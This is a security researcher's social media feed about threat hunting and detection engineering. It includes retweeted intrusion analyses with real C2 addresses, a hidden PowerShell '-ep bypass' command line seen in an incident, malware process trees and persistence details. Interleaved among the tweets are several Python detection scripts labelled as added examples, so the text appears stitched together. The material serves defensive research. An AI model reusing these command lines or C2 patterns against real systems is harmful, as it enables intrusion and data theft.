Joined December 2021
Pinned Tweet
I wrote a book! A Dance of Red and Blue - the epistemology, game theory, and craft behind detection engineering. Giving away copies. Reply with your best cybersec joke or meme and I'll pick some folks to send it to. koifsec.medium.com/my-book-a… amazon.com/dp/B0GT1LQHF6
KoifSec retweeted
The Threat Hunting League is coming
We’re launching the Threat Hunting League, a recurring competition series for threat hunters, detection engineers, incident responders, and SOC analysts. Each round is built around realistic intrusion activity. Participants investigate evidence, submit findings, earn points, climb the leaderboard, and compete across the wider season. First 3 winners will receive prizes! For this first competition that we'll be announcing soon, the first-place winner will receive a course giveaway from a leading security training provider! We’ll announce the first event soon, including the scenario, registration window, prize details, and scoring format. Learn more about The Threat Hunting League and upcoming competitions: threathuntinglabs.com/compet…
Published a new article that examines WSL for payload staging, check it out > detect.fyi/the-interesting-c…
KoifSec retweeted
Komari just landed in LOLRMM and this one's different. Komari doesn't need to be abused to function as a C2. The control channel ships enabled by default. You point it at a server you control and type an install command. That's it. @HuntressLabs caught it being dropped as a SYSTEM-level backdoor, disguised as "Windows Update Service", pulled straight from GitHub. The line between "self-hosted monitoring" and "self-hosted C2" doesn't exist here. That's exactly why it belongs in the catalog. Thanks @KoifSec for the contribution. 🫡
🔗 lolrmm.io/tools/komari
🧩 github.com/magicsword-io/LOL…
📖 huntress.com/blog/komari-c2-…
Published a new post right now on DetectFYI: "The Life-Dinner Principle in Detection", continuing from the latest post about arms race dynamics. Enjoy! detect.fyi/the-life-dinner-p…
Found a TP today from the Axios incident. The observed command was:
C:\ProgramData\wt.exe -w hidden -ep bypass -file C:\Users\xxx\AppData\Local\Temp\6202033.ps1 http://sfrclak.[com]:8000
wt.exe running from unusual directories. Thanks to @HuntressLabs for their research on this.
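A detection for the pattern in the post above, as an added example that is not code from the post or from Huntress: it flags a wt.exe process that runs outside the packaged-app directory or carries PowerShell-style switches. Sysmon-style field names and the sample events are assumptions constructed for the example.

```python
# Added example (not from the original post): flag wt.exe (Windows Terminal)
# processes that run from outside the packaged-app directory or that carry
# PowerShell-style switches, as in the observed command line.
# Events use Sysmon-style field names (Image, CommandLine, OriginalFileName);
# the sample records are constructed.
import re
from pathlib import PureWindowsPath

# The real wt.exe is a packaged app installed under WindowsApps.
EXPECTED_WT_DIRS = (r"c:\program files\windowsapps",)
# Abbreviated and full PowerShell parameter names that Windows Terminal
# does not accept (it takes subcommands such as "new-tab").
PS_SWITCH_RE = re.compile(
    r"(?i)(?:^|\s)-(?:ep|executionpolicy|w|windowstyle|nop|noprofile|file|enc|encodedcommand)\b")

def wt_masquerade_findings(event):
    """Reasons this event looks like PowerShell renamed to wt.exe ([] if none)."""
    image = PureWindowsPath(event["Image"])
    if image.name.lower() != "wt.exe":
        return []
    reasons = []
    parent_dir = str(image.parent).lower()
    if not any(parent_dir.startswith(d) for d in EXPECTED_WT_DIRS):
        reasons.append(f"wt.exe running from unexpected directory {image.parent}")
    if PS_SWITCH_RE.search(event["CommandLine"]):
        reasons.append("PowerShell-style switches passed to wt.exe")
    if event.get("OriginalFileName", "").lower() == "powershell.exe":
        reasons.append("PE OriginalFileName is powershell.exe")
    return reasons

def scan(events):
    """Map each flagged image path to its list of findings."""
    return {e["Image"]: f for e in events if (f := wt_masquerade_findings(e))}

# Constructed sample events; the first mirrors the command line in the post,
# the second is a benign launch (package directory name is illustrative).
SAMPLE_EVENTS = [
    {"Image": r"C:\ProgramData\wt.exe",
     "CommandLine": r"C:\ProgramData\wt.exe -w hidden -ep bypass -file "
                    r"C:\Users\xxx\AppData\Local\Temp\6202033.ps1 http://sfrclak.[com]:8000",
     "OriginalFileName": "PowerShell.EXE"},
    {"Image": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_x64\wt.exe",
     "CommandLine": "wt.exe new-tab",
     "OriginalFileName": "WindowsTerminal.exe"},
]
```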
KoifSec retweeted
Today I’m launching Threat Hunting Labs. Over the years I’ve analyzed many real-world intrusions. One thing became obvious: most training platforms don’t resemble how investigations actually happen. So I built something different. Threat Hunting Labs focuses on investigation-driven learning using real telemetry and structured investigative paths. If you want to get better at investigating breaches, you should practice investigating breaches. More details here: threathuntinglabs.com/blog/i…
If you're dealing with code packages or supply-chain risks, just open-sourced one of my tools - deps.sh - completely usable from the CLI as well. Enjoy!
KoifSec retweeted
LSASS DLL loading can be abused to establish persistence inside a highly privileged system process. This registry modification alters the Notification Packages value under the LSA key, causing LSASS to load additional packages at startup. Any unexpected LSA Notification Packages entry should be treated as suspicious. hackers-arise.com/advanced-w… @three_cube @_aircorridor @DI0256 #redteam #DFIR #blueteam #pentest
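A check for the registry value described in the post above, as an added example that is not from the linked article: it parses the Notification Packages entries out of reg query output and reports anything outside an allow-list. The baseline of scecli and the sample reg query output are assumptions constructed for the example.

```python
# Added example (not from the original post): audit the LSA
# "Notification Packages" value against an allow-list and report anything
# unexpected. The reg query output below is constructed; the baseline
# {"scecli"} is an assumption (some servers legitimately add rassfm) and
# should be taken from a clean reference host.
import re

LSA_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa"
VALUE_NAME = "Notification Packages"
BASELINE = frozenset({"scecli"})

def parse_reg_query_multi_sz(text, value_name=VALUE_NAME):
    """Extract a REG_MULTI_SZ value from `reg query` output, which prints
    the entries joined by the literal two-character sequence \\0."""
    pat = re.compile(rf"^\s*{re.escape(value_name)}\s+REG_MULTI_SZ\s+(.*)$", re.M)
    m = pat.search(text)
    if not m:
        raise ValueError(f"{value_name} not found in reg query output")
    return [e for e in m.group(1).strip().split(r"\0") if e]

def unexpected_packages(entries, baseline=BASELINE):
    """Return (entry, reason) pairs for entries that deviate from baseline."""
    findings = []
    for e in entries:
        name = e.lower()
        if "\\" in e or "/" in e:
            # LSASS resolves bare names from System32; a path means someone
            # pointed it somewhere else.
            findings.append((e, "entry is a path rather than a bare DLL name"))
        elif name.removesuffix(".dll") not in baseline:
            findings.append((e, "not in baseline"))
    return findings

# Constructed reg query output with two extra packages appended.
SAMPLE_OUTPUT = rf"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    {VALUE_NAME}    REG_MULTI_SZ    scecli\0C:\Users\Public\helper.dll\0notify
"""

def audit(text=SAMPLE_OUTPUT):
    return unexpected_packages(parse_reg_query_multi_sz(text))
```

On a live host the same list can be read with winreg.QueryValueEx on the LSA key and passed straight to unexpected_packages.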
KoifSec retweeted
We invited the first 150 users who signed up for early access. All invitees receive free credits to go through the investigations we currently have in beta. Great feedback so far! 🙏 We will invite the second wave early next week! Thank you to everyone who is providing feedback!
Introducing the "Adversarial Detection Engineering (ADE) Framework"! Developed by myself and Nikolas Bielski, ADE aims to be for detection rules what MITRE is for attack techniques and CWE is for code. github.com/NikolasBielski/Ad… adeframework.org/
KoifSec retweeted
I came across a GhostPulse/HijackLoader intrusion via ClickFix with some interesting evasion techniques. Starts with a PowerShell cradle (178.17.59\.26:5506) deploying an MSI dropper. The GhostPulse loader (81f9a196...) has 0 detections on VT despite being a known binary — still figuring out how it was weaponized: virustotal.com/gui/file/81f9…

PlaneV128.exe registers a keylogger (RegisterRawInputDevices), injects into Chrome/Edge via SetThreadContext, and launches browsers in headless mode for credential harvesting. Hardware breakpoints set for anti-debugging.

PlaneV128.exe dropped sup.msi (164MB) which extracted the superintendent application during its update routine. 172MB exfil to 84.21.173.142:80 over ~18 min. Persistence via Run key (HyperPackQuickCoreator → C:\Users\<user>\AppData\Local\MegaMaxion\superintendent.exe). The superintendent.exe binary appears to be legitimate software, currently investigating for possible DLL side-loading…

explorer.exe
└─ powershell.exe -nop -w hidden
   └─ msiexec.exe s1161271080.msi
      └─ S_Circuitr.exe
         └─ PlaneV128.exe (GhostPulse)
            ├─ chrome.exe --headless
            ├─ msedge.exe --headless
            └─ msiexec.exe sup.msi
               └─ superintendent.exe

Signed executables using ZONER/Crisp IM certificates observed throughout the chain.

Links:
• joesandbox.com/analysis/1862…
• tria.ge/260205-ce1n5sdv3g
• bazaar.abuse.ch/sample/d63f3…

Hunt for PowerShell cradles paired with --headless browser launches.

What's particularly interesting: Multiple components have zero detection. If you've seen similar intrusions or have insights on superintendent.exe/this chain, please comment below or reach out. cc @malwrhunterteam
KoifSec retweeted
#GoreloRMM being pushed via a suspected email phishing campaign where the URL leads the user to a site with a "Download Proposal" button. This downloads a raw Gorelo installer. Same lure/tactic used as another campaign at the beginning of the month that pushed #ImmyBot. VT next
KoifSec retweeted
I’m moving all Threat Hunting Labs logistics to @ThruntingLabs. I want to keep this personal feed focused on research and thoughts without spamming you with project updates. If you're waiting on access or status news, follow there! 🙏
It’s time! We’re slowly opening the gates to the Threat Hunting Labs for everyone who registered. Watch your inbox. threathuntinglabs.com
KoifSec retweeted
This is a very interesting intrusion using deno.exe in a way I haven’t personally seen before. What stands out here is not just Deno itself, but the full execution chain and how multiple runtimes are stitched together.

It starts via an MSI that launches a VBS script. VBS acts as the initial orchestrator: it drops and runs PowerShell, installs Deno, writes a JavaScript runner to %LOCALAPPDATA%, and explicitly creates a Startup LNK for persistence. That LNK points to a hidden PowerShell command which executes deno run --allow-all romeo_worker74.cjs (good detection opportunity!!), ensuring execution on every user logon.

From there, Deno takes over as a loader/backdoor. It fingerprints the host, reaches out to sharecodepro\.com, and waits for server-delivered modules. It then kicks off a scheduled task that runs pythonw.exe from C:\ProgramData\<random_chars>\, executing a Python backdoor. Defender exclusions are added for the Python path to reduce visibility.

The Python component connects to 23\.94\.145\.120:9999 as its main C2 and also queries ip-api\.com for basic situational awareness. PowerShell is additionally used to retrieve more payloads (Petuhon\.zip, Smokest120\.zip), indicating parallel tooling or follow-on stages.

In short, this is a multi-stage, multi-language intrusion:
• VBS for orchestration and persistence
• PowerShell for payload delivery
• Deno as a modular execution framework
• Python as a secondary, more traditional C2 channel

Lightweight components, user-level persistence, and flexible server-driven capabilities. The execution pattern is the most interesting part here. I'll update this post if anything else comes up.
Possible interesting "topwebcomicsv1.msi": 5a1c14335d0a8b007ff2813e6ef738e8836be38257cc82fe03c02b71d71e1b01 It is using Deno, "the next-generation JavaScript runtime". Seeing malware using Deno is not a common thing, at least yet... 🤷‍♂️
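A process-tree correlation covering both hunting leads from the posts above (headless Chrome/Edge beneath a PowerShell cradle in the GhostPulse chain, and deno run --allow-all launched by a hidden PowerShell command in the Deno chain), as an added example that is not from either post. The process records, their paths and the minimal pid/ppid/image/cmdline schema are assumptions constructed for the example.

```python
# Added example (not from the original posts): flag browser --headless and
# "deno run --allow-all" launches that sit anywhere below a hidden or
# no-profile PowerShell in the process tree. The process records are
# constructed; the pid/ppid/image/cmdline schema is an assumption.
import re
from pathlib import PureWindowsPath

HIDDEN_PS_RE = re.compile(r"(?i)-(?:w|windowstyle)\s+hidden|-nop\b|-noprofile\b")
BROWSERS = {"chrome.exe", "msedge.exe"}

def suspicious_child_reason(proc):
    """Why this process is interesting on its own (None if it is not)."""
    name = PureWindowsPath(proc["image"]).name.lower()
    cmd = proc["cmdline"].lower()
    if name in BROWSERS and "--headless" in cmd:
        return "headless browser launch"
    if name == "deno.exe" and re.search(r"\brun\b.*--allow-all", cmd):
        return "deno run --allow-all"
    return None

def ancestors(pid, procs):
    """Yield parent, grandparent, ... by following ppid links (cycle-safe)."""
    seen, p = set(), procs.get(procs[pid]["ppid"])
    while p and p["pid"] not in seen:
        seen.add(p["pid"])
        yield p
        p = procs.get(p["ppid"])

def find_chains(proc_list):
    """(child pid, reason, powershell pid) for each suspicious child that has
    a hidden or no-profile PowerShell anywhere above it in the tree."""
    procs = {p["pid"]: p for p in proc_list}
    hits = []
    for p in proc_list:
        reason = suspicious_child_reason(p)
        if reason:
            for a in ancestors(p["pid"], procs):
                if PureWindowsPath(a["image"]).name.lower() == "powershell.exe" and HIDDEN_PS_RE.search(a["cmdline"]):
                    hits.append((p["pid"], reason, a["pid"]))
                    break
    return hits

# Constructed records echoing the two chains; pid 8 is a benign headless run.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_PROCS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 2, "ppid": 1, "image": PS, "cmdline": "powershell.exe -nop -w hidden"},
    {"pid": 3, "ppid": 2, "image": r"C:\Windows\System32\msiexec.exe", "cmdline": "msiexec.exe s1161271080.msi"},
    {"pid": 4, "ppid": 3, "image": r"C:\Users\u\AppData\Local\Temp\PlaneV128.exe", "cmdline": "PlaneV128.exe"},
    {"pid": 5, "ppid": 4, "image": CHROME, "cmdline": "chrome.exe --headless"},
    {"pid": 6, "ppid": 1, "image": PS, "cmdline": "powershell.exe -w hidden -c deno run --allow-all romeo_worker74.cjs"},
    {"pid": 7, "ppid": 6, "image": r"C:\Users\u\.deno\bin\deno.exe", "cmdline": "deno run --allow-all romeo_worker74.cjs"},
    {"pid": 8, "ppid": 1, "image": CHROME, "cmdline": "chrome.exe --headless --dump-dom https://example.test"},
]
```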
KoifSec retweeted
📢 EDR Silencing
📖 1x Playbook - A structured breakdown of the full approach
💡 6x Procedures - Practical, reproducible techniques mapped to real-world operator workflows
🚨 1x Sigma Rule - To help defenders spot this activity
💭 Would love your thoughts ipurple.team/2026/01/12/edr-…
#purpleteam #ipurple #redteam